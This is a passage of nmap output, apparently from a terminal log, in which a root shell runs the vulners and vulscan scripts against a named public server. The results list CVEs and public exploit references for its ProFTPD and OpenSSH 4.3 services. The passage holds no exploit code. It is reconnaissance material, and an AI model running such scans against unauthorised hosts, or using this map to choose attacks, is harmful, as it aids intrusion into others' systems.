  2042. | [2705] ProFTPD 1.3.0 main.c CommandBufferSize denial of service
  2043. |
  2044. | MITRE CVE - https://cve.mitre.org:
  2045. | [CVE-2011-4130] Use-after-free vulnerability in the Response API in ProFTPD before 1.3.3g allows remote authenticated users to execute arbitrary code via vectors involving an error that occurs after an FTP data transfer.
  2046. | [CVE-2011-1137] Integer overflow in the mod_sftp (aka SFTP) module in ProFTPD 1.3.3d and earlier allows remote attackers to cause a denial of service (memory consumption leading to OOM kill) via a malformed SSH message.
  2047. | [CVE-2010-4652] Heap-based buffer overflow in the sql_prepare_where function (contrib/mod_sql.c) in ProFTPD before 1.3.3d, when mod_sql is enabled, allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a crafted username containing substitution tags, which are not properly handled during construction of an SQL query.
  2048. | [CVE-2010-4221] Multiple stack-based buffer overflows in the pr_netio_telnet_gets function in netio.c in ProFTPD before 1.3.3c allow remote attackers to execute arbitrary code via vectors involving a TELNET IAC escape character to a (1) FTP or (2) FTPS server.
  2049. | [CVE-2010-3867] Multiple directory traversal vulnerabilities in the mod_site_misc module in ProFTPD before 1.3.3c allow remote authenticated users to create directories, delete directories, create symlinks, and modify file timestamps via directory traversal sequences in a (1) SITE MKDIR, (2) SITE RMDIR, (3) SITE SYMLINK, or (4) SITE UTIME command.
  2050. | [CVE-2009-3639] The mod_tls module in ProFTPD before 1.3.2b, and 1.3.3 before 1.3.3rc2, when the dNSNameRequired TLS option is enabled, does not properly handle a '\0' character in a domain name in the Subject Alternative Name field of an X.509 client certificate, which allows remote attackers to bypass intended client-hostname restrictions via a crafted certificate issued by a legitimate Certification Authority, a related issue to CVE-2009-2408.
  2051. | [CVE-2004-0529] The modified suexec program in cPanel, when configured for mod_php and compiled for Apache 1.3.31 and earlier without mod_phpsuexec, allows local users to execute untrusted shared scripts and gain privileges, as demonstrated using untainted scripts such as (1) proftpdvhosts or (2) addalink.cgi, a different vulnerability than CVE-2004-0490.
  2052. | [CVE-2012-6095] ProFTPD before 1.3.5rc1, when using the UserOwner directive, allows local users to modify the ownership of arbitrary files via a race condition and a symlink attack on the (1) MKD or (2) XMKD commands.
  2053. | [CVE-2009-0543] ProFTPD Server 1.3.1, with NLS support enabled, allows remote attackers to bypass SQL injection protection mechanisms via invalid, encoded multibyte characters, which are not properly handled in (1) mod_sql_mysql and (2) mod_sql_postgres.
  2054. | [CVE-2009-0542] SQL injection vulnerability in ProFTPD Server 1.3.1 through 1.3.2rc2 allows remote attackers to execute arbitrary SQL commands via a "%" (percent) character in the username, which introduces a "'" (single quote) character during variable substitution by mod_sql.
  2055. | [CVE-2008-7265] The pr_data_xfer function in ProFTPD before 1.3.2rc3 allows remote authenticated users to cause a denial of service (CPU consumption) via an ABOR command during a data transfer.
  2056. | [CVE-2008-4242] ProFTPD 1.3.1 interprets long commands from an FTP client as multiple commands, which allows remote attackers to conduct cross-site request forgery (CSRF) attacks and execute arbitrary FTP commands via a long ftp:// URI that leverages an existing session from the FTP client implementation in a web browser.
  2057. | [CVE-2006-6563] Stack-based buffer overflow in the pr_ctrls_recv_request function in ctrls.c in the mod_ctrls module in ProFTPD before 1.3.1rc1 allows local users to execute arbitrary code via a large reqarglen length value.
  2058. | [CVE-2006-6171] ** DISPUTED ** ProFTPD 1.3.0a and earlier does not properly set the buffer size limit when CommandBufferSize is specified in the configuration file, which leads to an off-by-two buffer underflow. NOTE: in November 2006, the role of CommandBufferSize was originally associated with CVE-2006-5815, but this was an error stemming from a vague initial disclosure. NOTE: ProFTPD developers dispute this issue, saying that the relevant memory location is overwritten by assignment before further use within the affected function, so this is not a vulnerability.
  2059. | [CVE-2006-6170] Buffer overflow in the tls_x509_name_oneline function in the mod_tls module, as used in ProFTPD 1.3.0a and earlier, and possibly other products, allows remote attackers to execute arbitrary code via a large data length argument, a different vulnerability than CVE-2006-5815.
  2060. | [CVE-2006-5815] Stack-based buffer overflow in the sreplace function in ProFTPD 1.3.0 and earlier allows remote attackers, probably authenticated, to cause a denial of service and execute arbitrary code, as demonstrated by vd_proftpd.pm, a "ProFTPD remote exploit."
  2061. | [CVE-2005-4816] Buffer overflow in mod_radius in ProFTPD before 1.3.0rc2 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long password.
  2062. | [CVE-2005-2390] Multiple format string vulnerabilities in ProFTPD before 1.3.0rc2 allow attackers to cause a denial of service or obtain sensitive information via (1) certain inputs to the shutdown message from ftpshut, or (2) the SQLShowInfo mod_sql directive.
  2063. |
  2064. | SecurityFocus - https://www.securityfocus.com/bid/:
  2065. | [50631] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
  2066. |
  2067. | IBM X-Force - https://exchange.xforce.ibmcloud.com:
  2068. | [80980] ProFTPD FTP commands symlink
  2069. | [71226] ProFTPD pool code execution
  2070. | [65207] ProFTPD mod_sftp module denial of service
  2071. | [64495] ProFTPD sql_prepare_where() buffer overflow
  2072. | [63658] ProFTPD FTP server backdoor
  2073. | [63407] mod_sql module for ProFTPD buffer overflow
  2074. | [63155] ProFTPD pr_data_xfer denial of service
  2075. | [62909] ProFTPD mod_site_misc directory traversal
  2076. | [62908] ProFTPD pr_netio_telnet_gets() buffer overflow
  2077. | [53936] ProFTPD mod_tls SSL certificate security bypass
  2078. | [48951] ProFTPD mod_sql username percent SQL injection
  2079. | [48558] ProFTPD NLS support SQL injection protection bypass
  2080. | [45274] ProFTPD URL cross-site request forgery
  2081. | [33733] ProFTPD Auth API security bypass
  2082. | [31461] ProFTPD mod_radius buffer overflow
  2083. | [30906] ProFTPD Controls (mod_ctrls) module buffer overflow
  2084. | [30554] ProFTPD mod_tls module tls_x509_name_oneline() buffer overflow
  2085. | [30147] ProFTPD sreplace() buffer overflow
  2086. | [21530] ProFTPD mod_sql format string attack
  2087. | [21528] ProFTPD shutdown message format string attack
  2088. | [19410] GProFTPD file name format string attack
  2089. | [18453] ProFTPD SITE CHGRP command allows group ownership modification
  2090. | [17724] ProFTPD could allow an attacker to obtain valid accounts
  2091. | [16038] ProFTPD CIDR entry ACL bypass
  2092. | [15387] ProFTPD off-by-one _xlate_ascii_write function buffer overflow
  2093. | [12369] ProFTPD mod_sql SQL injection
  2094. | [12200] ProFTPD ASCII file newline buffer overflow
  2095. | [10932] ProFTPD long PASS command buffer overflow
  2096. | [8332] ProFTPD mod_sqlpw stores passwords in the wtmp log file
  2097. | [7818] ProFTPD ls "
  2098. | [7816] ProFTPD file globbing denial of service
  2099. | [7126] ProFTPD fails to resolve hostnames
  2100. | [6433] ProFTPD format string
  2101. | [6209] proFTPD /var symlink
  2102. | [6208] ProFTPD contains configuration error in postinst script when running as root
  2103. | [5801] proftpd memory leak when using SIZE or USER commands
  2104. | [5737] ProFTPD system using mod_sqlpw unauthorized access
  2105. |
  2106. | Exploit-DB - https://www.exploit-db.com:
  2107. | [16878] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (FreeBSD)
  2108. | [16851] ProFTPD 1.3.2rc3 - 1.3.3b Telnet IAC Buffer Overflow (Linux)
  2109. | [15662] ProFTPD 1.3.3c compromised source remote root Trojan
  2110. | [20690] wu-ftpd 2.4/2.5/2.6,Trolltech ftpd 1.2,ProFTPD 1.2,BeroFTPD 1.3.4 FTP glob Expansion Vulnerability
  2111. | [16852] ProFTPD 1.2 - 1.3.0 sreplace Buffer Overflow (Linux)
  2112. | [10044] ProFTPd 1.3.0 mod_ctrls Local Stack Overflow (opensuse)
  2113. | [3730] ProFTPD 1.3.0/1.3.0a (mod_ctrls) Local Overflow Exploit (exec-shield)
  2114. | [3333] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit 2
  2115. | [3330] ProFTPD 1.3.0/1.3.0a (mod_ctrls support) Local Buffer Overflow Exploit
  2116. | [2928] ProFTPD <= 1.3.0a (mod_ctrls support) Local Buffer Overflow PoC
  2117. | [2856] ProFTPD 1.3.0 (sreplace) Remote Stack Overflow Exploit (meta)
  2118. |
  2119. | OpenVAS (Nessus) - http://www.openvas.org:
  2120. | [103331] ProFTPD Prior To 1.3.3g Use-After-Free Remote Code Execution Vulnerability
  2121. | [63497] Debian Security Advisory DSA 1730-1 (proftpd-dfsg)
  2122. |
  2123. | SecurityTracker - https://www.securitytracker.com:
  2124. | [1028040] ProFTPD MKD/XMKD Race Condition Lets Local Users Gain Elevated Privileges
  2125. | [1026321] ProFTPD Use-After-Free Memory Error Lets Remote Authenticated Users Execute Arbitrary Code
  2126. | [1020945] ProFTPD Request Processing Bug Permits Cross-Site Request Forgery Attacks
  2127. | [1017931] ProFTPD Auth API State Error May Let Remote Users Access the System in Certain Cases
  2128. | [1017167] ProFTPD sreplace() Off-by-one Bug Lets Remote Users Execute Arbitrary Code
  2129. | [1012488] ProFTPD SITE CHGRP Command Lets Remote Authenticated Users Modify File/Directory Group Ownership
  2130. | [1011687] ProFTPd Login Timing Differences Disclose Valid User Account Names to Remote Users
  2131. | [1009997] ProFTPD Access Control Bug With CIDR Addresses May Let Remote Authenticated Users Access Files
  2132. | [1009297] ProFTPD _xlate_ascii_write() Off-By-One Buffer Overflows Let Remote Users Execute Arbitrary Code With Root Privileges
  2133. | [1007794] ProFTPD ASCII Mode File Upload Buffer Overflow Lets Certain Remote Users Execute Arbitrary Code
  2134. | [1007020] ProFTPD Input Validation Flaw When Authenticating Against Postgresql Using 'mod_sql' Lets Remote Users Gain Access
  2135. | [1003019] ProFTPD FTP Server May Allow Local Users to Execute Code on the Server
  2136. | [1002354] ProFTPD Reverse DNS Feature Fails to Check Forward-to-Reverse DNS Mappings
  2137. | [1002148] ProFTPD Site and Quote Commands May Allow Remote Users to Execute Arbitrary Commands on the Server
  2138. |
  2139. | OSVDB - http://www.osvdb.org:
  2140. | [89051] ProFTPD Multiple FTP Command Handling Symlink Arbitrary File Overwrite
  2141. | [77004] ProFTPD Use-After-Free Response Pool Allocation List Parsing Remote Memory Corruption
  2142. | [70868] ProFTPD mod_sftp Component SSH Payload DoS
  2143. | [70782] ProFTPD contrib/mod_sql.c sql_prepare_where Function Crafted Username Handling Remote Overflow
  2144. | [69562] ProFTPD on ftp.proftpd.org Compromised Source Packages Trojaned Distribution
  2145. | [69200] ProFTPD pr_data_xfer Function ABOR Command Remote DoS
  2146. | [68988] ProFTPD mod_site_misc Module Multiple Command Traversal Arbitrary File Manipulation
  2147. | [68985] ProFTPD netio.c pr_netio_telnet_gets Function TELNET_IAC Escape Sequence Remote Overflow
  2148. | [59292] ProFTPD mod_tls Module Certificate Authority (CA) subjectAltName Field Null Byte Handling SSL MiTM Weakness
  2149. | [57311] ProFTPD contrib/mod_ratio.c Multiple Unspecified Buffer Handling Issues
  2150. | [57310] ProFTPD Multiple Unspecified Overflows
  2151. | [57309] ProFTPD src/support.c Unspecified Buffer Handling Issue
  2152. | [57308] ProFTPD modules/mod_core.c Multiple Unspecified Overflows
  2153. | [57307] ProFTPD Multiple Modules Unspecified Overflows
  2154. | [57306] ProFTPD contrib/mod_pam.c Multiple Unspecified Buffer Handling Issues
  2155. | [57305] ProFTPD src/main.c Unspecified Overflow
  2156. | [57304] ProFTPD src/log.c Logfile Handling Unspecified Race Condition
  2157. | [57303] ProFTPD modules/mod_auth.c Unspecified Issue
  2158. | [51954] ProFTPD Server NLS Support mod_sql_* Encoded Multibyte Character SQL Injection Protection Bypass
  2159. | [51953] ProFTPD Server mod_sql username % Character Handling SQL Injection
  2160. | [51849] ProFTPD Character Encoding SQL Injection
  2161. | [51720] ProFTPD NLST Command Argument Handling Remote Overflow
  2162. | [51719] ProFTPD MKDIR Command Directory Name Handling Remote Overflow
  2163. | [48411] ProFTPD FTP Command Truncation CSRF
  2164. | [34602] ProFTPD Auth API Multiple Auth Module Authentication Bypass
  2165. | [31509] ProFTPD mod_ctrls Module pr_ctrls_recv_request Function Local Overflow
  2166. | [30719] mod_tls Module for ProFTPD tls_x509_name_oneline Function Remote Overflow
  2167. | [30660] ProFTPD CommandBufferSize Option cmd_loop() Function DoS
  2168. | [30267] ProFTPD src/support.c sreplace() Function Remote Overflow
  2169. | [23063] ProFTPD mod_radius Password Overflow DoS
  2170. | [20212] ProFTPD Host Reverse Resolution Failure ACL Bypass
  2171. | [18271] ProFTPD mod_sql SQLShowInfo Directive Format String
  2172. | [18270] ProFTPD ftpshut Shutdown Message Format String
  2173. | [14012] GProftpd gprostats Utility Log Parser Remote Format String
  2174. | [10769] ProFTPD File Transfer Newline Character Overflow
  2175. | [10768] ProFTPD STAT Command Remote DoS
  2176. | [10758] ProFTPD Login Timing Account Name Enumeration
  2177. | [10173] ProFTPD mod_sqlpw wtmp Authentication Credential Disclosure
  2178. | [9507] PostgreSQL Authentication Module (mod_sql) for ProFTPD USER Name Parameter SQL Injection
  2179. | [9163] ProFTPD MKDIR Directory Creation / Change Remote Overflow (palmetto)
  2180. | [7166] ProFTPD SIZE Command Memory Leak Remote DoS
  2181. | [7165] ProFTPD USER Command Memory Leak DoS
  2182. | [5744] ProFTPD CIDR IP Subnet ACL Bypass
  2183. | [5705] ProFTPD Malformed cwd Command Format String
  2184. | [5638] ProFTPD on Debian Linux postinst Installation Privilege Escalation
  2185. | [4134] ProFTPD in_xlate_ascii_write() Function RETR Command Remote Overflow
  2186. | [144] ProFTPD src/log.c log_xfer() Function Remote Overflow
  2187. |_
  2188. Service Info: OS: Unix
  2189.  
  2190. Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
  2191. Nmap done: 1 IP address (1 host up) scanned in 10.51 seconds
  2192.  
  2193.  
  2194. root@blackbox:/usr/share/nmap/scripts# nmap --script nmap-vulners,vulscan --script-args vulscandb -sV -p22 184.154.192.250
  2195. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 14:30 CST
  2196. Nmap scan report for server.etours.cn (184.154.192.250)
  2197. Host is up (0.037s latency).
  2198.  
  2199. PORT STATE SERVICE VERSION
  2200. 22/tcp open ssh OpenSSH 4.3 (protocol 2.0)
  2201. | vulners:
  2202. | cpe:/a:openbsd:openssh:4.3:
  2203. | CVE-2006-5051 9.3 https://vulners.com/cve/CVE-2006-5051
  2204. | CVE-2006-4924 7.8 https://vulners.com/cve/CVE-2006-4924
  2205. | CVE-2014-1692 7.5 https://vulners.com/cve/CVE-2014-1692
  2206. | CVE-2010-4478 7.5 https://vulners.com/cve/CVE-2010-4478
  2207. | CVE-2007-4752 7.5 https://vulners.com/cve/CVE-2007-4752
  2208. | CVE-2009-2904 6.9 https://vulners.com/cve/CVE-2009-2904
  2209. | CVE-2017-15906 5.0 https://vulners.com/cve/CVE-2017-15906
  2210. | CVE-2016-10708 5.0 https://vulners.com/cve/CVE-2016-10708
  2211. | CVE-2010-5107 5.0 https://vulners.com/cve/CVE-2010-5107
  2212. | CVE-2008-4109 5.0 https://vulners.com/cve/CVE-2008-4109
  2213. | CVE-2007-2243 5.0 https://vulners.com/cve/CVE-2007-2243
  2214. | CVE-2006-5052 5.0 https://vulners.com/cve/CVE-2006-5052
  2215. | CVE-2010-4755 4.0 https://vulners.com/cve/CVE-2010-4755
  2216. | CVE-2012-0814 3.5 https://vulners.com/cve/CVE-2012-0814
  2217. | CVE-2011-5000 3.5 https://vulners.com/cve/CVE-2011-5000
  2218. | CVE-2011-4327 2.1 https://vulners.com/cve/CVE-2011-4327
  2219. |_ CVE-2008-3259 1.2 https://vulners.com/cve/CVE-2008-3259
  2220. | vulscan: VulDB - https://vuldb.com:
  2221. | [44077] OpenBSD OpenSSH up to 4.3 Signal denial of service
  2222. | [39331] OpenSSH 4.3p2 Audit Log linux_audit_record_event unknown vulnerability
  2223. | [43307] OpenSSH 4.0 unknown vulnerability
  2224. | [41835] OpenSSH up to 4.8 unknown vulnerability
  2225. | [38743] OpenSSH up to 4.6 unknown vulnerability
  2226. | [36382] OpenBSD OpenSSH up to 4.6 information disclosure
  2227. | [32699] OpenBSD OpenSSH 4.1 denial of service
  2228. | [2667] OpenBSD OpenSSH 4.4 Separation Monitor unknown vulnerability
  2229. |
  2230. | MITRE CVE - https://cve.mitre.org:
  2231. | [CVE-2009-2904] A certain Red Hat modification to the ChrootDirectory feature in OpenSSH 4.8, as used in sshd in OpenSSH 4.3 in Red Hat Enterprise Linux (RHEL) 5.4 and Fedora 11, allows local users to gain privileges via hard links to setuid programs that use configuration files within the chroot directory, related to requirements for directory ownership.
  2232. | [CVE-2008-4109] A certain Debian patch for OpenSSH before 4.3p2-9etch3 on etch
  2233. | [CVE-2008-1483] OpenSSH 4.3p2, and probably other versions, allows local users to hijack forwarded X connections by causing ssh to set DISPLAY to :10, even when another process is listening on the associated port, as demonstrated by opening TCP port 6010 (IPv4) and sniffing a cookie sent by Emacs.
  2234. | [CVE-2007-3102] Unspecified vulnerability in the linux_audit_record_event function in OpenSSH 4.3p2, as used on Fedora Core 6 and possibly other systems, allows remote attackers to write arbitrary characters to an audit log via a crafted username. NOTE: some of these details are obtained from third party information.
  2235. | [CVE-2010-4755] The (1) remote_glob function in sftp-glob.c and the (2) process_put function in sftp.c in OpenSSH 5.8 and earlier, as used in FreeBSD 7.3 and 8.1, NetBSD 5.0.2, OpenBSD 4.7, and other products, allow remote authenticated users to cause a denial of service (CPU and memory consumption) via crafted glob expressions that do not match any pathnames, as demonstrated by glob expressions in SSH_FXP_STAT requests to an sftp daemon, a different vulnerability than CVE-2010-2632.
  2236. | [CVE-2008-3844] Certain Red Hat Enterprise Linux (RHEL) 4 and 5 packages for OpenSSH, as signed in August 2008 using a legitimate Red Hat GPG key, contain an externally introduced modification (Trojan Horse) that allows the package authors to have an unknown impact. NOTE: since the malicious packages were not distributed from any official Red Hat sources, the scope of this issue is restricted to users who may have obtained these packages through unofficial distribution points. As of 20080827, no unofficial distributions of this software are known.
  2237. | [CVE-2008-3234] sshd in OpenSSH 4 on Debian GNU/Linux, and the 20070303 OpenSSH snapshot, allows remote authenticated users to obtain access to arbitrary SELinux roles by appending a :/ (colon slash) sequence, followed by the role name, to the username.
  2238. | [CVE-2008-1657] OpenSSH 4.4 up to versions before 4.9 allows remote authenticated users to bypass the sshd_config ForceCommand directive by modifying the .ssh/rc session file.
  2239. | [CVE-2007-6415] scponly 4.6 and earlier allows remote authenticated users to bypass intended restrictions and execute arbitrary code by invoking scp, as implemented by OpenSSH, with the -F and -o options.
  2240. | [CVE-2007-4752] ssh in OpenSSH before 4.7 does not properly handle when an untrusted cookie cannot be created and uses a trusted X11 cookie instead, which allows attackers to violate intended policy and gain privileges by causing an X client to be treated as trusted.
  2241. | [CVE-2007-2243] OpenSSH 4.6 and earlier, when ChallengeResponseAuthentication is enabled, allows remote attackers to determine the existence of user accounts by attempting to authenticate via S/KEY, which displays a different response if the user account exists, a similar issue to CVE-2001-1483.
  2242. | [CVE-2006-5794] Unspecified vulnerability in the sshd Privilege Separation Monitor in OpenSSH before 4.5 causes weaker verification that authentication has been successful, which might allow attackers to bypass authentication. NOTE: as of 20061108, it is believed that this issue is only exploitable by leveraging vulnerabilities in the unprivileged process, which are not known to exist.
  2243. | [CVE-2006-5229] OpenSSH portable 4.1 on SUSE Linux, and possibly other platforms and versions, and possibly under limited configurations, allows remote attackers to determine valid usernames via timing discrepancies in which responses take longer for valid usernames than invalid ones, as demonstrated by sshtime. NOTE: as of 20061014, it appears that this issue is dependent on the use of manually-set passwords that causes delays when processing /etc/shadow due to an increased number of rounds.
  2244. | [CVE-2006-5052] Unspecified vulnerability in portable OpenSSH before 4.4, when running on some platforms, allows remote attackers to determine the validity of usernames via unknown vectors involving a GSSAPI "authentication abort."
  2245. | [CVE-2006-5051] Signal handler race condition in OpenSSH before 4.4 allows remote attackers to cause a denial of service (crash), and possibly execute arbitrary code if GSSAPI authentication is enabled, via unspecified vectors that lead to a double-free.
  2246. | [CVE-2006-4924] sshd in OpenSSH before 4.4, when using the version 1 SSH protocol, allows remote attackers to cause a denial of service (CPU consumption) via an SSH packet that contains duplicate blocks, which is not properly handled by the CRC compensation attack detector.
  2247. | [CVE-2006-0225] scp in OpenSSH 4.2p1 allows attackers to execute arbitrary commands via filenames that contain shell metacharacters or spaces, which are expanded twice.
  2248. | [CVE-2005-2798] sshd in OpenSSH before 4.2, when GSSAPIDelegateCredentials is enabled, allows GSSAPI credentials to be delegated to clients who log in using non-GSSAPI methods, which could cause those credentials to be exposed to untrusted users or hosts.
  2249. | [CVE-2005-2797] OpenSSH 4.0, and other versions before 4.2, does not properly handle dynamic port forwarding ("-D" option) when a listen address is not provided, which may cause OpenSSH to enable the GatewayPorts functionality.
  2250. | [CVE-2005-2666] SSH, as implemented in OpenSSH before 4.0 and possibly other implementations, stores hostnames, IP addresses, and keys in plaintext in the known_hosts file, which makes it easier for an attacker that has compromised an SSH user's account to generate a list of additional targets that are more likely to have the same password or key.
  2251. | [CVE-2001-1029] libutil in OpenSSH on FreeBSD 4.4 and earlier does not drop privileges before verifying the capabilities for reading the copyright and welcome files, which allows local users to bypass the capabilities checks and read arbitrary files by specifying alternate copyright or welcome files.
  2252. |
  2253. | SecurityFocus - https://www.securityfocus.com/bid/:
  2254. | [4560] OpenSSH Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
  2255. |
  2256. | IBM X-Force - https://exchange.xforce.ibmcloud.com:
  2257. | [8896] OpenSSH Kerberos 4 TGT/AFS buffer overflow
  2258. |
  2259. | Exploit-DB - https://www.exploit-db.com:
  2260. | [2444] OpenSSH <= 4.3 p1 (Duplicated Block) Remote Denial of Service Exploit
  2261. | [21402] OpenSSH 2.x/3.x Kerberos 4 TGT/AFS Token Buffer Overflow Vulnerability
  2262. | [3303] Portable OpenSSH <= 3.6.1p-PAM / 4.1-SUSE Timing Attack Exploit
  2263. |
  2264. | OpenVAS (Nessus) - http://www.openvas.org:
  2265. | [902488] OpenSSH 'sshd' GSSAPI Credential Disclosure Vulnerability
  2266. | [900179] OpenSSH CBC Mode Information Disclosure Vulnerability
  2267. | [881183] CentOS Update for openssh CESA-2012:0884 centos6
  2268. | [880802] CentOS Update for openssh CESA-2009:1287 centos5 i386
  2269. | [880746] CentOS Update for openssh CESA-2009:1470 centos5 i386
  2270. | [870763] RedHat Update for openssh RHSA-2012:0884-04
  2271. | [870129] RedHat Update for openssh RHSA-2008:0855-01
  2272. | [861813] Fedora Update for openssh FEDORA-2010-5429
  2273. | [861319] Fedora Update for openssh FEDORA-2007-395
  2274. | [861170] Fedora Update for openssh FEDORA-2007-394
  2275. | [861012] Fedora Update for openssh FEDORA-2007-715
  2276. | [840345] Ubuntu Update for openssh vulnerability USN-597-1
  2277. | [840300] Ubuntu Update for openssh update USN-612-5
  2278. | [840271] Ubuntu Update for openssh vulnerability USN-612-2
  2279. | [840268] Ubuntu Update for openssh update USN-612-7
  2280. | [840259] Ubuntu Update for openssh vulnerabilities USN-649-1
  2281. | [840214] Ubuntu Update for openssh vulnerability USN-566-1
  2282. | [831074] Mandriva Update for openssh MDVA-2010:162 (openssh)
  2283. | [830929] Mandriva Update for openssh MDVA-2010:090 (openssh)
  2284. | [830807] Mandriva Update for openssh MDVA-2010:026 (openssh)
  2285. | [830603] Mandriva Update for openssh MDVSA-2008:098 (openssh)
  2286. | [830523] Mandriva Update for openssh MDVSA-2008:078 (openssh)
  2287. | [830317] Mandriva Update for openssh-askpass-qt MDKA-2007:127 (openssh-askpass-qt)
  2288. | [830191] Mandriva Update for openssh MDKSA-2007:236 (openssh)
  2289. | [802407] OpenSSH 'sshd' Challenge Response Authentication Buffer Overflow Vulnerability
  2290. | [103503] openssh-server Forced Command Handling Information Disclosure Vulnerability
  2291. | [103247] OpenSSH Ciphersuite Specification Information Disclosure Weakness
  2292. | [103064] OpenSSH Legacy Certificate Signing Information Disclosure Vulnerability
  2293. | [100584] OpenSSH X Connections Session Hijacking Vulnerability
  2294. | [100153] OpenSSH CBC Mode Information Disclosure Vulnerability
  2295. | [66170] CentOS Security Advisory CESA-2009:1470 (openssh)
  2296. | [65987] SLES10: Security update for OpenSSH
  2297. | [65819] SLES10: Security update for OpenSSH
  2298. | [65514] SLES9: Security update for OpenSSH
  2299. | [65513] SLES9: Security update for OpenSSH
  2300. | [65334] SLES9: Security update for OpenSSH
  2301. | [65248] SLES9: Security update for OpenSSH
  2302. | [65218] SLES9: Security update for OpenSSH
  2303. | [65169] SLES9: Security update for openssh,openssh-askpass
  2304. | [65126] SLES9: Security update for OpenSSH
  2305. | [65019] SLES9: Security update for OpenSSH
  2306. | [65015] SLES9: Security update for OpenSSH
  2307. | [64931] CentOS Security Advisory CESA-2009:1287 (openssh)
  2308. | [61639] Debian Security Advisory DSA 1638-1 (openssh)
  2309. | [61030] Debian Security Advisory DSA 1576-2 (openssh)
  2310. | [61029] Debian Security Advisory DSA 1576-1 (openssh)
  2311. | [60840] FreeBSD Security Advisory (FreeBSD-SA-08:05.openssh.asc)
  2312. | [60803] Gentoo Security Advisory GLSA 200804-03 (openssh)
  2313. | [60667] Slackware Advisory SSA:2008-095-01 openssh
  2314. | [59014] Slackware Advisory SSA:2007-255-01 openssh
  2315. | [58741] Gentoo Security Advisory GLSA 200711-02 (openssh)
  2316. | [57919] Gentoo Security Advisory GLSA 200611-06 (openssh)
  2317. | [57895] Gentoo Security Advisory GLSA 200609-17 (openssh)
  2318. | [57585] Debian Security Advisory DSA 1212-1 (openssh (1:3.8.1p1-8.sarge.6))
  2319. | [57492] Slackware Advisory SSA:2006-272-02 openssh
  2320. | [57483] Debian Security Advisory DSA 1189-1 (openssh-krb5)
  2321. | [57476] FreeBSD Security Advisory (FreeBSD-SA-06:22.openssh.asc)
  2322. | [57470] FreeBSD Ports: openssh
  2323. | [56352] FreeBSD Security Advisory (FreeBSD-SA-06:09.openssh.asc)
  2324. | [56330] Gentoo Security Advisory GLSA 200602-11 (OpenSSH)
  2325. | [56294] Slackware Advisory SSA:2006-045-06 openssh
  2326. | [53964] Slackware Advisory SSA:2003-266-01 New OpenSSH packages
  2327. | [53885] Slackware Advisory SSA:2003-259-01 OpenSSH Security Advisory
  2328. | [53884] Slackware Advisory SSA:2003-260-01 OpenSSH updated again
  2329. | [53788] Debian Security Advisory DSA 025-1 (openssh)
  2330. | [52638] FreeBSD Security Advisory (FreeBSD-SA-03:15.openssh.asc)
  2331. | [52635] FreeBSD Security Advisory (FreeBSD-SA-03:12.openssh.asc)
  2332. | [11343] OpenSSH Client Unauthorized Remote Forwarding
  2333. | [10954] OpenSSH AFS/Kerberos ticket/token passing
  2334. | [10883] OpenSSH Channel Code Off by 1
  2335. | [10823] OpenSSH UseLogin Environment Variables
  2336. |
  2337. | SecurityTracker - https://www.securitytracker.com:
  2338. | [1028187] OpenSSH pam_ssh_agent_auth Module on Red Hat Enterprise Linux Lets Remote Users Execute Arbitrary Code
  2339. | [1026593] OpenSSH Lets Remote Authenticated Users Obtain Potentially Sensitive Information
  2340. | [1025739] OpenSSH on FreeBSD Has Buffer Overflow in pam_thread() That Lets Remote Users Execute Arbitrary Code
  2341. | [1025482] OpenSSH ssh-keysign Utility Lets Local Users Gain Elevated Privileges
  2342. | [1025028] OpenSSH Legacy Certificates May Disclose Stack Contents to Remote Users
  2343. | [1022967] OpenSSH on Red Hat Enterprise Linux Lets Remote Authenticated Users Gain Elevated Privileges
  2344. | [1021235] OpenSSH CBC Mode Error Handling May Let Certain Remote Users Obtain Plain Text in Certain Cases
  2345. | [1020891] OpenSSH on Debian Lets Remote Users Prevent Logins
  2346. | [1020730] OpenSSH for Red Hat Enterprise Linux Packages May Have Been Compromised
  2347. | [1020537] OpenSSH on HP-UX Lets Local Users Hijack X11 Sessions
  2348. | [1019733] OpenSSH Unsafe Default Configuration May Let Local Users Execute Arbitrary Commands
  2349. | [1019707] OpenSSH Lets Local Users Hijack Forwarded X Sessions in Certain Cases
  2350. | [1017756] Apple OpenSSH Key Generation Process Lets Remote Users Deny Service
  2351. | [1017183] OpenSSH Privilege Separation Monitor Validation Error May Cause the Monitor to Fail to Properly Control the Unprivileged Process
  2352. | [1016940] OpenSSH Race Condition in Signal Handler Lets Remote Users Deny Service and May Potentially Permit Code Execution
  2353. | [1016939] OpenSSH GSSAPI Authentication Abort Error Lets Remote Users Determine Valid Usernames
  2354. | [1016931] OpenSSH SSH v1 CRC Attack Detection Implementation Lets Remote Users Deny Service
  2355. | [1016672] OpenSSH on Mac OS X Lets Remote Users Deny Service
  2356. | [1015706] OpenSSH Interaction With OpenPAM Lets Remote Users Deny Service
  2357. | [1015540] OpenSSH scp Double Shell Character Expansion During Local-to-Local Copying May Let Local Users Gain Elevated Privileges in Certain Cases
  2358. | [1014845] OpenSSH May Unexpectedly Activate GatewayPorts and Also May Disclose GSSAPI Credentials in Certain Cases
  2359. | [1011193] OpenSSH scp Directory Traversal Flaw Lets Remote SSH Servers Overwrite Files in Certain Cases
  2360. | [1011143] OpenSSH Default Configuration May Be Unsafe When Used With Anonymous SSH Services
  2361. | [1007791] Portable OpenSSH PAM free() Bug May Let Remote Users Execute Root Code
  2362. | [1007716] OpenSSH buffer_append_space() and Other Buffer Management Errors May Let Remote Users Execute Arbitrary Code
  2363. | [1006926] OpenSSH Host Access Restrictions Can Be Bypassed By Remote Users
  2364. | [1006688] OpenSSH Timing Flaw With Pluggable Authentication Modules Can Disclose Valid User Account Names to Remote Users
  2365. | [1004818] OpenSSH's Secure Shell (SSH) Implementation Weakness May Disclose User Passwords to Remote Users During Man-in-the-Middle Attacks
  2366. | [1004616] OpenSSH Integer Overflow and Buffer Overflow May Allow Remote Users to Gain Root Access to the System
  2367. | [1004391] OpenSSH 'BSD_AUTH' Access Control Bug May Allow Unauthorized Remote Users to Authenticated to the System
